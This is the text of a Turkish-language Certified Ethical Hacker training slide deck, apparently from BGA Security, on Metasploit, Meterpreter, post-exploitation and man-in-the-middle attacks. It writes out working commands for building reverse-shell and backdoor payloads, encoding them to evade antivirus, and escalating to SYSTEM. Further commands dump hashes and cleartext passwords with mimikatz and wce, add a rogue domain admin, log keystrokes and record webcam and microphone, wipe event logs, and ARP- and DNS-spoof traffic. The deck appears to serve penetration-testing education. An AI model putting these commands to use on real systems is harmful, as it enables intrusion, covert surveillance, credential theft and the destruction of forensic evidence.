  • 68. BGA | CEH @BGASecurity Msfconsole | Exploit Seçimi  Exploit seçimi yapıldıkdan sonra, exploit için işlem menüsü ile karşılacaksınız.Exploit komutlarını listelemek için yardım komutunu (help) kullanabiliriz. Exploit Komutları ve açıklamaları aşağıdaki gibidir; Komut Açıklama ---------- ----------- Check Exploit öncesi güvenlik açığının kontrolü yapar. exploit Exploiti tetikler. pry Seçili modül için pry oturumu başlatır. rcheck Hedef sistemin zayıflığını tekrar kontrol eder reload Yalnızca module yükler rexploit Exploiti tekrar çalıştırır.
  • 69. BGA | CEH @BGASecurity Msfconsole | Exploit Seçimi  Exploit seçimi yapıldıkdan sonra, exploit için işlem menüsü ile karşılacaksınız.Exploit komutlarını listelemek için yardım komutunu (help) kullanabiliriz. Exploit Komutları ve açıklamaları aşağıdaki gibidir; Komut Açıklama ---------- ----------- Check Exploit öncesi güvenlik açığının kontrolü yapar. exploit Exploiti tetikler. pry Seçili modül için pry oturumu başlatır. rcheck Hedef sistemin zayıflığını tekrar kontrol eder reload Yalnızca module yükler rexploit Exploiti tekrar çalıştırır.
  • 70. BGA | CEH @BGASecurity Msfconsole | Payload Seçimi  Payload Seçimi Geçerli exploit için kullanılabilir payload’ları listelemek için, “show payloads” komutu kullanılır.
  • 71. BGA | CEH @BGASecurity Msfconsole | Payload Seçimi “info” komutu ile seçilen payload için gerekli seçenekler ve varsayılan olarak atanan değerler listelenir. Payload seçimi için “set PAYLOAD payload_adı” komutu kullanılır. Örnekte kullandığımız VNC Inject payloadı için bu komut “set PAYLOAD windows/vncinject/reverse_tcp” şeklinde olucaktır.
  • 72. BGA | CEH @BGASecurity Msfconsole | Seçenekler  Seçeneklerin Ayarlanması Exploit ve payload seçiminden sonra, uygulanacak hedef ve gerekli seçenekler belirtilmelidir.  Exploit ve Payload seçeneklerini “show options” komutu ile görüntüleyebiliriz.
  • 74. BGA | CEH @BGASecurity Msfconsole | Seçenekler Required sütununda “yes” ile belirtilen seçeneklerin mutlaka belirtilmesi gerekir. Bu ayarlar şöyle yapılır ;  RHOST = hostname veya ip adresi yazılabilir  LHOST = saldırıyı yapan sistemin ip adresi.  LPORT = Hedef ile iletişim kurulacağı yerel port. Firewall , IDS/IPSleri atlatmak için 443. portu kullanmanız önerilir. LPORT ile belirteceğiniz portun sisteminizde açık ve filtrelenmemiş olması gerekir.
  • 75. BGA | CEH @BGASecurity Msfconsole | Exploit Sonrası Exploitin sonrası VNC ekran görüntüsü
  • 76. BGA | CEH @BGASecurity Msfpayload  Msfpayload aracı, metesploitde kullanılan payloadları derlemek için kullanılır.  Exploit geliştiricileri exploit yazarken, payloadlarada ihtiyaç duyarlar bu noktada msfpayload exploit geliştiricileri için bulunmaz nimettir.  Metasploit’in msfpayload aracı sayesinde istenilen payloadın çıktısı C , Perl, Ruby, Raw, Javascript, VBA ve exe olarak alınabilir.
  • 77. BGA | CEH @BGASecurity Msfpayload msfpayload -h parametresi ile temel kullanımını, seçeneklerini ve payloadları görebilirsiniz. Kullanımı:
  • 78. BGA | CEH @BGASecurity Msfpayload Payload Seçeneklerini Görüntülemek
  • 79. BGA | CEH @BGASecurity Msfpayload Seçenekler listesinde “Required”bölümündeki alanlar mutlaka doldurulmalıdır. Bazı seçenekler varsayılan olarak tanımlı gelmektedir.
  • 80. BGA | CEH @BGASecurity Msfpayload  Seçenekleri Belirlemek Payload seçeneklerini belirlemek oldukça basittir, aşağıdaki örnekde olduğu gibi söz dizimi kullanarak ayarlar belirlenebilir.
  • 81. BGA | CEH @BGASecurity Msfpayload  Farklı dillerde shellcode oluşturulabilir. Payloadın farklı formatlarda shellcode çıktısını alabiliriz, örneğin; C,Perl,raw,java,js vb.
  • 82. BGA | CEH @BGASecurity Msfpayload Payload Derlemek Windows sistemlerde çalışacak şekilde çalıştırılabilir, exe dosyası oluşturalım. msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 X > backdoor.exe
  • 83. BGA | CEH @BGASecurity Meterpreter  Meterpreter , Meta-Interpreter ‘in kısaltılmışıdır.  Modül destekli üst düzey bir payload’tır.  Açık kaynak kodlu kolayca geliştirilebilir, kendi eklentilerinizi geliştirmenize izin verir ve DLL olarak yeni modüller eklenebilir.  Meterpreterin çalıştığı sistemlerde anti-virüs yazılımları, nids tarzı yazılımlardan korunmak için içerik dahili kriptolama özelliği mevcuttur.
  • 84. BGA | CEH @BGASecurity Meterpreter MSF 3.x ile birlikte yeni gelen ; Süreç birleştirme, IRB script desteği ,Timestomp ve SAM HashDump özellikleri mevcut.Meterpreter yeni bir alt süreç olarak doğrudan bellekte çalışıyor bu sayede hacking sonrası kurban bilgisayarda iz bırakmaz ve adli delil toplamada saldırıya dair iz bulunması zorlaşır. Meterpreter de esnekliği ve kullanım kolaylığı olan bir dizi komut ve eklenti bulunuyor.
  • 85. BGA | CEH @BGASecurity Meterpreter Varsayılan Meterpreter Komutları ; Komut Açıklama use Bir veya daha fazla eklenti yüklemek için kullanılır loadlib İstismar sürecinde yeni bir kütüphane yüklenebilir read Uzak sistemden veri okur write Uzak sisteme geçerli kanal üzerinden veri yazar close Kanalı kapatır. interact Kanalda interaktif bir oturum başlatır initcrypt İstemci ve sunucu arasındaki iletişim için bir keyfi şifreleme algoritması oluşturur.
  • 86. BGA | CEH @BGASecurity Meterpreter | Ağ Komutları Ağ Komutları Komut Açıklama ipconfig Ağ ayarlarlarını görüntüler portfwd Yerel portu uzak bir servise yönlendirir route Yönlendirme tablosunu görüntüler ve değiştirir
  • 87. BGA | CEH @BGASecurity Meterpreter | Sistem Komutları Sistem Komutları Komut Açıklama clearev Olay loglarını temizle drop_token Herhangi bir etkin kimliğe bürünme belirteci bırakır. execute Komut çalıştırır getpid Geçerli proses tanımlayıcısını göster. getprivs Yetki yükseltme komutlarını göster getuid Sunucuda çalışan kullanıcıyı göster kill Bir prosesi öldür ps Çalışan prosesleri listele
  • 88. BGA | CEH @BGASecurity Meterpreter | Sistem Komutları II Sistem Komutları Komut Açıklama reboot Uzak bilgisayarı yeniden başlatır reg Uzak bilgisayarın registery ayarlarını değiştir. rev2self Uzak bilgisayar üzerinde RevertToSelf() arar shell Sistem komut satırına geç shutdown Uzak sistemi kapat steal_token Hedef sistemde proses yetkilerine geçiş yapar sysinfo Uzak sistem hakkında detaylı bilgi alır
  • 89. BGA | CEH @BGASecurity Meterpreter | Kullanıcı Arayüzü Komutları Kullanıcı Arayüzü Komutları Komut Açıklama enumdesktops Erişilebilir tüm masaüstlerini göster getdesktop Geçerli meterpreter masaüstünü göster idletime Boş vakti gösterir keyscan_dump Klavye girişlerini kayıt eder keyscan_start Klavye girişlerini dinlemeye başla keyscan_stop Klavye girişlerini dinlemeyi durdur screenshot Masaüstünün ekran görüntüsünü al setdesktop Meterpreter geçerli masaüstünü değiştir. uictl Bazı kullanıcı arabirimi bileşenlerini denetler
  • 90. BGA | CEH @BGASecurity Meterpreter | Yetki Yükseltme Komutları Priv: Yetki Yükseltme Komutları Komut Açıklama getsystem Yerel yetki yükseltme tekniklerini uygula
  • 91. BGA | CEH @BGASecurity Meterpreter uygulamaları  getsystem ile system haklarına geçiş yapılır.  Execute komutu ile uzak sunucuda komut koşturulabilir. Execute –f cmd.exe –i –H  sysinfo ile hedef işletim sistemi hakkında bilgi alınabilir.  getuid ile hangi yetkiler ile komut koşturduğumuzu görebiliriz.  shell komutu ile doğrudan işletim sistemi shell alınabilir.  clearev komutu ile event logları silinebilir.
  • 92. BGA | CEH @BGASecurity Meterpreter uygulamaları - II  Hedef sistemden screenshot almak için(-q resim kalite değeri); screenshot –p /root/Desktop/test.jpg –q 60  Ortam ses kaydı almak için; record_mic -d 60 -f /root/Desktop/ses.wav  webcam_list ile hedef sistemdeki kameraları görebiliriz.  Webcam üzerinden screenshot alma(-v bittiginde oto. açılmasn) webcam_snap -p /root/kamera.jpg -q 60 -v false
  • 93. BGA | CEH @BGASecurity Meterpreter Uygulamaları - III  pwd uzak sistem üzerindeki path bilgisini verir.  lpwd local sistemimizde çalıştığımız dizini görebiliriz.  cd D: komutu ile başka bir partiation geçilebilir.  lcd /root komutu ile localde başka bir dizine geçilir.  run keylogrecorder ile hedef sistemde keyloger çalıştırılır. Veya keyscan_start denildekten sonra keyscan_dump ile klavye çıktıları elde edilebilir. Sonlandırmak için keyscan_stop kullanılır.  run winenum ile sistem üzerinde bir çok komut çalıştırılarak sistem hakkında detaylı bilgiler elde edilebilir.  meterpreter > run arp_scanner -r 172.16.16.1-254 // Diğer subnetler taranabilir.
  • 94. BGA | CEH @BGASecurity Msfencode Msfencode, istenilen payloadın içeriğini değiştirerek Kaçak Giriş Tespit  ve Engelleme Sistemleri (IDS/IPS), Güvenlik Duvarları (Firewall) ve Antivirüsler tarafından tanınmasını engeller/zorlaştırır. Metasploit Frameworkde 27+ encoder bulunuyor.Encoderları listelemek için -l paramatresi diğer seçenekler için –h parametresi kullanılır.
  • 95. BGA | CEH @BGASecurity Msfencode  Encoder Kullanımı  Shellcode’u msfpayload ile raw formatında msfencode a aktarıp içeriği encode edebilirsiniz. Metasploit’de bulunan güçlü encoder’lar ile içerik antivirus, content fitler, ids/ips sistemleri tarafından tanınmaz hale getirilebilir. # msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112 LPORT=4443 R | msfencode -e x86/shikata_ga_nai -t exe -o /var/www/payload.exe
  • 96. BGA | CEH @BGASecurity Msfencode  Multi-Encoder Kullanımı  Payload içeriği bir çok encoder ile değiştirilerek yeniden oluşturulabilir. # msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112 LPORT=4443 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode –e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 –t exe -o /var/www/payload2.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) …..
  • 97. @BGASecurity Client - Side Saldırı Yöntemleri BÖLÜM - V
  • 98. BGA | CEH @BGASecurity Client-Side Saldırı Yöntemleri | İçerik 1. Browser Tabanlı Açıklıklar 2. Binary Payloadlar 3. Antivirüsleri Atlatmak 4. Linux Binary Trojan 5. Java Uygulamalarını Bulaştırmak 6. File Format Exploitler 7. VBScript Enjekte Yöntemleri
  • 99. BGA | CEH @BGASecurity Browser Tabanlı Açıklıklar  Bir browser exploiti, kötü amaçlı geliştirilmiş zararlı kod parçasıdır.  Kullanıcının bilgisi olmadan, bilgisayarına zararlı yazılım bulaştırmak veya izinsiz/yetkisiz değişikliklerde bulunmak için kullanılır.  Zararlı kod; HTML, Image, Java, Javascript, ActiveX veya başka bir web teknolojisi olabilir.  Zayıflıklar, browser teknolojisinden veya eklentilerinden kaynaklanabilir
  • 100. BGA | CEH @BGASecurity Browser Tabanlı Açıklıklar Internet Explorer CSS IMPORT
  • 101. BGA | CEH @BGASecurity Smbexec ile antivirüs atlama
  • 102. BGA | CEH @BGASecurity Veil ile AV Atlatma  Av atlatmak için zararlı oluşturma için kullanılabilecek başarılı bir araçtır. veil -l powershell -p VirtualAlloc -o undetectable -- msfpayload windows/meterpreter/reverse_tcp -- msfoptions LHOST=6.6.6.150 LPORT=443
  • 103. BGA | CEH @BGASecurity Metload ile Antivirüs Atlatma  64 bit sistemler için derleme; x86_64-w64-mingw32-gcc -o metload64.exe metload.c - lws2_32  32 bit sistemler için derleme; i686-w64-mingw32-gcc -o metload32.exe metload.c - lws2_32
  • 104. BGA | CEH @BGASecurity Migrate ile Antivirüs Atlatma  Meterpreter ajanı çalışan başka bir uygulamaya kendini bulaştırabilir ve o uygulama üzerinden yetkisiz işlevler gerçekleştirebilir.  Uygulamaya bulaştığında uygulamanın boyutu değişmez  Antivirus, Antilogger bypass için tercih edilir.  Proxy Auth. Bypass etmek için kullanılır.
  • 105. BGA | CEH @BGASecurity Migrate ile Antivirüs Atlama II  Kullanımı meterpreter > migrate Usage: migrate pid  “ps” komutu ile çalışan processlerin id si öğrenilebilir. meterpreter > ps PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 860 explorer.exe x86 1 pentestlabsozanus C:WindowsExplorer.EXE
  • 106. BGA | CEH @BGASecurity Migrate ile Antivirüs atlama meterpreter > migrate 860 [*] Migrating to 860... [*] Migration completed successfully. meterpreter > getuid Server username: pentestlabsozanus
  • 107. BGA | CEH @BGASecurity #Exploit Sonrası Sistemde İlerleme Post exploitation olarak da adlandırılır. Amaç herhangi bir güvenlik zafiyeti kullanarak sisteme gerçekleştirilen yetkisiz, düşük yetkili bir kullanıcı haklarıyla sistemi ele geçirme, sistemi ara geçit olarak kullanarak başka sistemlere atlama. Bu bölüm, exploit sonrası uzak sistemde ilerleme,gizleme ve kayıtları silme yöntemlerinin anlaşışması ve uygulanmasını içerir.
  • 108. BGA | CEH @BGASecurity İlerleme Adımları/Aşamaları 1. Yetki Yükseltme 2. Hashdump 3. Parola Kırma (jonh the ripper) 4. Başka Bir Uygulamaya Bulaşmak 5. Pivoting 6. Memorydump 7. Uzak Masaüstü Bağlantısı Başlatmak 8. Hedefin Canlı Oturumuna Geçiş 9. İz Temizleme 10. Trafik Dinleme (Packet Sniffing) 11. Ekran Görüntüsü Yakalama 12. Ses, Webcam Görüntüsünü Yakalama
  • 109. BGA | CEH @BGASecurity Yetki Yükseltme Hedef sistem, kisitli kullanici yetkileri ile ele geçirildiginde yetki yükseltmek ve farklı kullanıcı yetkilere geçiş yapmak.
  • 110. BGA | CEH @BGASecurity Yetki Yükseltme meterpreter > getsystem Local privilege escalation teknikleri ile SYSTEM yetkilerine yükseltir. meterpreter > getsystem -t 1 …got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITYSYSTEM
  • 111. BGA | CEH @BGASecurity Yetki Yükseltme meterpreter > getsystem -h Usage: getsystem [options] Attempt to elevate your privilege to that of local system. OPTIONS: -h Help Banner. -t The technique to use. (Default to ‘0′). 0 : All techniques available 1 : Service – Named Pipe Impersonation (In Memory/Admin) 2 : Service – Named Pipe Impersonation (Dropper/Admin) 3 : Service – Token Duplication (In Memory/Admin) 4 : Exploit – KiTrap0D (In Memory/User)
  • 112. BGA | CEH @BGASecurity Hasdump Windows sistemlerde SAM database’inden kullanıcı hesaplarını ve LM/NTML password hashlerini alır.
  • 113. BGA | CEH @BGASecurity Yetki Yükseltme Aşaması  Meterpreter ajanı çalışan başka bir uygulamaya kendini bulaştırabilir ve o uygulama üzerinden yetkisiz işlevler gerçekleştirebilir.  Uygulamaya bulaştığında uygulamanın boyutu değişmez  Antivirus, Antilogger bypass için tercih edilir.  Proxy Auth. Bypass etmek için kullanılır.
  • 114. BGA | CEH @BGASecurity Pivoting  Uzak ağı, dış dünyaya açmak için kullanılır.  Firewall/NAT veya Router arkasındaki sistemlere erişmek için tercih edilir.  Port yönlendirme yapılabilir.  Uzak ağ ile VPN tuneli kurulabilir.
  • 115. BGA | CEH @BGASecurity Pivoting | Portfwd meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L <opt> The local host to listen on (optional). -h Help banner. -l <opt> The local port to listen on. -p <opt> The remote port to connect to. -r <opt> The remote host to connect to. meterpreter > portfwd add -l 3389 -p 3333 -r 127.0.0.1 [*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3333
  • 116. BGA | CEH @BGASecurity Pivoting | Route  Uzak ağdaki diğer ip adreslerine erişmek için kullanılır.  VPN tuneline benzetilebilir.
  • 117. BGA | CEH @BGASecurity Pivoting | Route msf > route -h Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] Route traffic destined to a given subnet through a supplied session. The default comm is Local. msf > route add 1.1.1.0 255.255.255.0 1 [*] Route added msf > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 1.1.1.0 255.255.255.0 Session 1
  • 118. BGA | CEH @BGASecurity İz Temizleme  Windows Loglarını Silme
  • 119. BGA | CEH @BGASecurity Trafik Dinleme (Packet Sniffing)  Exploiting sonrası hedef sistemde ilerleme aşamasında trafik kayıtları önemli veriler içerebilir.  Uzak bir sistem ele geçirildiğinde, hedef sistemde ilerlemek için elde edilecek kritik verilerden biride network trafiğidir.  Ele geçirilen sistemin üzerinden ftp,http,smtp,pop3 vb. trafiği akıyor ve şifre içeriyor olabilir. Meterpreter ajanının sniffing özelliği ile, uzak sistemin ağ kartını dinleyerek trafiği kaydedebilirsiniz.
  • 120. BGA | CEH @BGASecurity Trafik Dinleme (Packet Sniffing) meterpreter > use sniffer Sniffer Komutları ================ Command Description ------- ----------- sniffer_dump Retrieve captured packet data to PCAP file sniffer_interfaces Enumerate all sniffable network interfaces sniffer_start Start packet capture on a specific interface sniffer_stats View statistics of an active capture sniffer_stop Stop packet capture on a specific interface
  • 121. BGA | CEH @BGASecurity Trafik Dinleme (Packet Sniffing) Komut açıklamaları; sniffer_dump: Yakalanan trafiği dosya olarak kaydeder. sniffer_interfaces: Ağ arabirimlerinin listesini verir. sniffer_start: Belirtilen ağ arabirimi için paket yakalamaya başlar sniffer_stats: Aktif sniffing için istatistlik sunar sniffer_stop: Belirtilen ağ arabirimi için dinlemeyi sonlandırır.
  • 122. BGA | CEH @BGASecurity Trafik Dinleme (Packet Sniffing)  Hedef sistemdeki ağ arabirimlerinin listesini ver, meterpreter > sniffer_interfaces 1 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )  1 numaralı ağ arabirimini dinle, 20000 paket yakala meterpreter > sniffer_start 1 20000 [*] Capture started on interface 1 (20000 packet buffer)
  • 123. BGA | CEH @BGASecurity Trafik Dinleme (Packet Sniffing)  Yakalanan trafiği diske kaydet meterpreter > sniffer_dump 1 /tmp/win2.cap [*] Flushing packet capture buffer for interface 1... [*] Flushed 6044 packets (741732 bytes) [*] Download completed, converting to PCAP... [*] PCAP file written to /tmp/win2.cap  Sniffing işlemini durdur meterpreter > sniffer_stop 1 [*] Capture stopped on interface 1
  • 124. BGA | CEH @BGASecurity Trafik Dinleme (Packet Sniffing) # tshark -r /tmp/win2.cap -R ftp 1182 15.000000 89.19.25.155 -> 1.1.1.101 FTP 96 Response: 220-FileZilla Server version 0.9.24 beta 1183 15.000000 89.19.25.155 -> 1.1.1.101 FTP 99 Response: 220-written by Tim Kosse (Tim.Kosse@gmx.de) 1184 15.000000 89.19.25.155 -> 1.1.1.101 FTP 115 Response: 220 Please visit http://sourceforge.net/projects/filezilla/ 1187 15.000000 1.1.1.101 -> 89.19.25.155 FTP 69 Request: USER bgaegitim 1188 15.000000 89.19.25.155 -> 1.1.1.101 FTP 90 Response: 331 Password required for ozanucar 1189 15.000000 1.1.1.101 -> 89.19.25.155 FTP 78 Request: PASS benimgizliparolam
  • 125. BGA | CEH @BGASecurity Exploit Sonrası Sistemde İlerleme  Post exploitation olarak da adlandırılır.  Amaç herhangi bir güvenlik zafiyeti kullanarak sisteme gerçekleştirilen yetkisiz, düşük yetkili bir kullanıcı haklarıyla sistemi ele geçirme, sistemi ara geçit olarak kullanarak başka sistemlere atlama.  Bu bölüm, exploit sonrası uzak sistemde ilerleme,gizleme ve kayıtları silme yöntemlerinin anlaşışması ve uygulanmasını içerir.
  • 126. BGA | CEH @BGASecurity Pass The Hash ile Diğer sistemlere erişim  Windows sistemler üzerinde elde edilen parola özeti(hash) ile doğrudan diğer sistemlere bağlantı gerçekleştirilebilmektedir.  Bunun için smb_login modülü kullanılabilir. (Blank_password,user_as_pass,spool) use auxiliary/scanner/smb/smb_login Set RHOST file://root/target.txt Set SMBUser user Set SMBPass pass Exploit
  • 127. BGA | CEH @BGASecurity Pass the hash ve Token Bulma  Easyda.sh  Metasploit Psexec_loggedin_users modülü  Find_token.exe  Bağlantıkları sistmlerde hangi kullanıcılara ait token varsa listelerler. C:> find_token.exe –f ipler.txt username password  Password bölümüne parolanın windows hash değeri de girilebilir
  • 128. BGA | CEH @BGASecurity DC’yi bulma ve kullanıcı ekleme  DC tespit edilir(run post/windows/gather/enum_domain) use incognito run post/windows/gather/enum_domain  DC’ye mevctu tokenlar kullanılarak kullanıcı eklenir add_user celal celal123!! –h dc_ip  DC’ye eklenen kullanıcı Domain admins/local administrators grubuna eklenir. add_group ‘Domain Admins’ celal –h dc_ip add_localgroup_user ‘Administrators’ celal –h dic_ip
  • 129. BGA | CEH @BGASecurity Sistemlerden Parolaları Cleartext Alma  Erişim sağlanan bir sistem belleğinden tüm kullancılara ait parolalar açık olarak elde edielbilmektedir.(mimikatz) use mimikatz ps –s winlogon migrate PID Wdigest
  • 130. BGA | CEH @BGASecurity Sistemlerden Parolaları Cleartext Alma - II  Mimikatz.exe hedef sisteme yüklenir. Ardından aşağıdaki komutlar ile hedef sistem üzerindeki parolalar açık olarak alınabilir. privilege::debug sekurlsa::logonpasswords
  • 131. BGA | CEH @BGASecurity Wce.exe ile mevcut parolayı değiştirme  Tüm kullanıcı parolalarını listelemek için (wce.exe –l)  Mevcut bir kullanıcı hashini değiştirmek için (wce –s administrator:domain:hash)  Parolaları açık almak için (wce -w)  Parola hashi oluşturmak için (wce –g 123456)
  • 132. BGA | CEH @BGASecurity Psexec ile sistemden parolasız shell  wce –s administrator:domain:hash ile mevcut admin kullanıcı parolası değiştirilirse doğrudan c$ (IPC$) üzerinden de parolasız bağlantı kurulabilir.  psexec IPc$ -s cmd komutu ile shell elde edilebilir.  Ardından hedef sisteme c$ üzerinden atılan zararlı çalıştırılarak meterpreter oturumu elde edilebilir.
  • 133. BGA | CEH @BGASecurity Route Kullanılarak Port Tarama(Nmap)  msf > db_nmap 6.6.6.0/24 -n -v -p 80,21 –open // nmap port tarama  msf > hosts –u //Up olan sistemleri getirir  msf > hosts -S tomcat –u //İçerisinde tomcat geçen up sistemler  msf > services -p 445 –u //445 portundan yalnız açık olanları listelere  msf > services -p 80 –R //80 portu açık olan sistemlerin yalnız IP adreslerini liste halinde bir dosyaya yazar yazdığı dosyayı size söyler.  msf > hosts -u –R //Up olan sistemlerin IP adreslerini bir dosyaya yazar ve bunu bize söyler
  • 134. BGA | CEH @BGASecurity Metasploit’e Nmap Sonuçlarını İmport  msf > db_import /root/Desktop/test.xml  [*] Importing 'Nmap XML' data  [*] Import: Parsing with 'Nokogiri v1.6.1'  [*] Importing host 193.140.255.1  [*] Importing host 193.140.255.13  [*] Importing host 193.140.255.17  [*] Importing host 193.140.255.19  [*] Importing host 193.140.255.20
  • 136. BGA | CEH @BGASecurity TCP/IP Güvenliği  TCP/IP güvenlik düşünülerek tasarlanmış bir protokol değildir.  Veri iletişimini her durumda sağlıklı ve güvenilir (verinin iletildiğinden emin olma) bir şekilde yapması amaçlanmıştır.  Alt seviye protokollerin(ARP)güvenilirliği üst seviye protokolleri etkiler.
  • 137. BGA | CEH @BGASecurity Arp Zehirleme (MITM Saldırısı) - I  ARP(Address Resolation Protokol) Layer 2’nin temel protokolüdür.  Yerel ağda iletişim IP adresi yerine MAC adresi üzerinden gerçekleştirilir.  İletişime geçilecek tüm cihazların (default gw dahil) MAC adresleri bilinmelidir.  MAC adresi yazılımsal olarak değiştirilebilir. (macchanger)  ARP poisoning, saldırganın kendisini GW olarak göstermesidir.
  • 138. BGA | CEH @BGASecurity Arp Zehirleme (MITM Saldırısı) - II  Saldırgan sürekli olarak ortama arp replay paketleri göndermektedir.(Broadcast olarak)  Herhangi bir kullanıcı bir yere gitmek istediğinde arp request oluşturacak ve buna saldırganın arp replay paketleri dönecektir.  Böylece kurbanlar arp poisoninge uğramış olacaktır.  arp –a komutu ile tüm iletişim halindeki sistmlere ait MAC-IP bilgisi görülebilir. Default gw mac adresi olarak artık saldırganın MAC adresi bu listede görülebilir.
  • 139. BGA | CEH @BGASecurity Ettercap ile MITM Saldırısı  Ettercap ile aşağıdaki komut ile MITM gerçekleştirilebilir. ettercap –i eth0 –T –M ARP /zehirlecek_ip/ /gateway/
  • 140. BGA | CEH @BGASecurity ArpSpoof ile MITM  arpspoof -i <interface> -t <target IP> <gateway IP>  Şeklinde arpspoof ile de man in the middle saldırısı gerçekleştirilebilir.  Ama öncelikle aşağıdaki komut ile trafik route edilmelidir. echo 1 > /proc/sys/net/ipv4/ip_forward
  • 141. BGA | CEH @BGASecurity Switch Kullanılan Ağlarda Trafik Dinleme  Hub ve benzeri ortamlarda trafik tüm portlara gider.  Switch ise sadece iletişim kuran iki host arasında paketleri döndürür.  Her host sadece kendisine ve broadcast adresine gelen paketleri görebilir.
  • 142. BGA | CEH @BGASecurity ARP Paket Çeşitleri  4 cesit ARP mesajı vardır ARP request : IP Adresine ait donanım adresi(MAC adresi) sorgulamak için kullanılır 10:09:20.356809 arp who-has 12.16.6.17 tell 12.16.6.185 ARP reply : Belirtilen Ip adresine uyan donanım adresini döndürür 10:09:20.356809 arp reply 12.16.6.17 is-at 0:80:c8:f8:5c:73 RARP request: Belirli bir MAC adresi için IP adresi sorgulaması için kullanılır RARP reply : Belirli MAC adresi için IP adresi cevabı döndürür.
  • 143. BGA | CEH @BGASecurity ARP Cache Poisoning/ ARP Spoofing(ARP Bellek Zehirlemesi)  Amaç: Kurban sisteme sahte arp paketleri(arp-reply) göndererek kendisini farklı bilgisayar gibi (Gateway?) göstermek ve kurbanın göndereceği trafiği üzerinden geçirmek.  ARP Poisoning gerçekleştirmek için kullanılan temel araçlar;  Linux İçin:  Arpspoof, nemesis, Ettercap  Windows için:  Winarpspoof, Ettercap, Cain&Abel
  • 144. BGA | CEH @BGASecurity Nemesis ile Arp Spoof Uygulaması
  • 145. BGA | CEH @BGASecurity Cain & Abel ile Spoofing / Poisoning Çalışmaları  Cain & Abel çok amaçlı bir Güvenlik aracıdır  Cain ve Abel olarak iki ana parçadan oluşur.  Bir parçası daha çok sistem ve parola işlemleri,  diğeri parçası ağ güvenliği ile alakalı programlar içerir. ARP spoof işlemi hangi arabirim üzerinden yapılacak?
  • 146. BGA | CEH @BGASecurity Cain&Abel ile Hedef Host Keşfi
  • 147. BGA | CEH @BGASecurity ARP Belleği Zehirlenecek Kurban Seçimi
  • 148. BGA | CEH @BGASecurity Kurbana Ait Parola Bilgilerini Görme
  • 149. BGA | CEH @BGASecurity Dnsspoof Çalışması  Amaç kurban olarak seçilen sistemin yapacağı dns sorgulamalarına müdahele etmektir.  Dnsspoof öncesi durum: Arpspoof ile hedef sistemin trafigi üzerimizden gecirilir.
  • 150. BGA | CEH @BGASecurity Dnsspoof Çalışması-II  ip_forward aktif duruma getirilerek trafigin hedefine yönlendirilmesi sağlanır.  Değiştirilmek istenen domainlere ait kayıtlar /tmp/domains dosyasına aşağıdaki formatta girilir. 127.0.0.1 *.google.com 192.168.1.5 www.linux.com  dnsspoof aracı çalıştırılır.
  • 151. BGA | CEH @BGASecurity Dnsspoof Saldırısını İzleme DNS Cache cevap verebilir. Dns cache temizlenip tekrar sorgulanır...
  • 152. BGA | CEH @BGASecurity HTTPS Trafiğinde Araya Girme  SSL bağlantılarında araya girme fikri ilk bakışta zor hatta imkansız gibi görülse de gerekli şartlar oluşturulduğunda oldukça kolay başarılabilmektedir  Gerekli Şartlar:  İlk olarak hedef sistemin trafiği APR ile bizim üzerimiden geçecek şekilde kandırılmalıdır.  Hedef sistemin iletişim kurmak istediği HTTPS sayfasına ait sertifika bilgileri ile sahte bir sertifika oluşturulmalıdır.  Sahte oluşturulan bu sertifika tüm modern browserlarda kullanıcıya uyarı verecektir.  Bazı browserlar bu uyarıyı oldukça kullanıcı yanlısı (rahatsız etmeyici yumusak bir mesaj) bazıları da oldukça rahatsız edici ve problemi belirtici uyarılarla gösterirler.
  • 153. BGA | CEH @BGASecurity Internet Explorer SSL MITM Uyarısı
  • 154. BGA | CEH @BGASecurity Firefox SSL MITM UYARISI
  • 155. BGA | CEH @BGASecurity Browser Hataları Internet Explorer 7,8 Firefox
  • 156. BGA | CEH @BGASecurity Cain&Abel ile SSL MITM Uygulaması Çözümlenen SSL altındaki protokole(örnekte http) ait gizli bilgiler de sol tarafda gözükecektir.
  • 157. BGA | CEH @BGASecurity Ettercap : Gelişmiş Hijacking Aracı  Ettercap, Linux ve Windows sistemlerde çalışan çok yönlü trafik dinleme, araya girme ve veri değiştirme aracıdır.  TCP/IP’deki zayıflıklardan yararlanır.  Komut satırı ve grafik arabirim seçenekleri mevcuttur. ettercap –C ile Curses modda çalıştırır Ettercap –I interaktif modda çalıştırır.
  • 158. BGA | CEH @BGASecurity Ettercap Kullanımı  İlk işlem hangi tür sniffing yapılacağının seçilmesi  Kurban sistem bulmak için Yerel ağ taraması yapılır.
  • 159. BGA | CEH @BGASecurity Kurban Seçimi Buradan istenilen system hedef olarak seçilir ve Target olarak eklenir. 1 2 4 3
  • 161. BGA | CEH @BGASecurity Ettercap Filtreleri Ettercap’in en güçlü olduğu yanlardan biri de akan trafikte filtreleme yapabilmesi ve bu filtrelemeye göre trafiği kaydedip değiştirebilmesidir.
  • 162. BGA | CEH @BGASecurity SSH Protokolünde Araya Girve ve Veri Okuma & Değiştirme SSH Protokolünde Araya Girilebilir mi?
  • 163. BGA | CEH @BGASecurity SSH Protokolü  SSH (Secure Shell/Güvenli Kabuk) ağ üzerinden başka bilgisayarlara erişim sağlamak, uzak bir bilgisayarda komutlar çalıştırmak ve bir bilgisayardan diğerine dosya transferi amaçlı geliştirilmiş bir protokoldür.  Bir iletişimde SSH aşağıda belirtilen temel unsurları sağlar. • Authentication /Kimlik denetimi • Encryption /Şifreleme • Integrity /Bütünlük
